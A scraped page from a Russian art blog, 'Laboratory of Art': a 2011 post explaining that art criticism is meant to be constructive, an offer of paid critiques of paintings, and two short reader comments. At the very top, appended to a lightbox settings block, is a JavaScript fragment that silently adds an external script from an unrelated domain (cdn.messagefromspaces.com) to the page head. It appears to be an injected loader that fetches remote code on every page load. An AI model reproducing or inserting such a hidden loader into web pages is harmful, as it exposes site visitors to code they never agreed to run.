, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Критика

Автор: Наталья Юрова | 26 Апр 2011

критикаПрежде чем говорить о критике искусства, разберемся с тем, что же на самом деле  такое критика?

У многих из нас понятие критики связано с порицанием, осуждением, негативными откликами. Даже такие сложные направления профессии, как литературный критик, или музыкальный критик вызывают у многих неодобрительные оценки и мысли: как же человек мог выбрать для себя профессию критика, неужели ему не на кого выплеснуть свои негативные эмоции?

На самом деле критика – понятие довольно обширное, и, что самое важное – ценное как для самого художника (писателя, музыканта), так и для его поклонников! Истинный критик – это профессионал в своей области, который методом анализа и оценки выявляет отрицательные и положительные стороны произведения искусства, будь то кинофильм, спектакль, картина художника или музыкальное произведение…

Настоящий критик – это некий гуру. Его критика направлена на созидание и развитие искусства умельца, но никак не на разрушение (как думают многие!) его творчества.

Критика можно сравнить с учителем (родителем, наставником), который методом указания на недочеты произведения, помогает детищу развиваться далее, а акцентированием внимания на достоинствах – поддерживает и дает вдохновение.

Каждый из нас по своему – критик, ведь у любого из нас есть собственное мнение по тому или иному вопросу. Но сущность настоящей критики – принести созидание, вдохновение и развитие дальнейшего для творчества, поднять автора произведения еще на одну ступень профессионализма выше. И, я думаю, каждый из нас должен научиться созидать своей критикой.

На сайте Лаборатория искусства вы можете сделать заказ критики. Критику картин будут делать наши специалисты, примеры работ Вы можете посмотреть в описании таких картин как:  "Два настроения, картины «Сирень» и «Тюльпаны»", "Осенняя прелюдия" , "Букет сирени: вариации"

Стоимость отзыва критика сейчас составляет 300 рублей или 10$ за 1000 знаков без пробелов.

Темы: Критика | Отзывов: 2 »

Отзывов: 2 на “Критика”

  1. Геннадий пишет:
    29 Апр 2011 в 22:33

    Я бы продолжил … найти смысл там где его нет, а возможно и наоборот. И если бы критику действительно было, что сказать, то он не брал бы деньги за знаки, а брал за статью. Я так думаю.

  2. Дмитрий пишет:
    04 Май 2011 в 09:50

    Геннадий Вы по своему правы, но все должно иметь конкретику.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress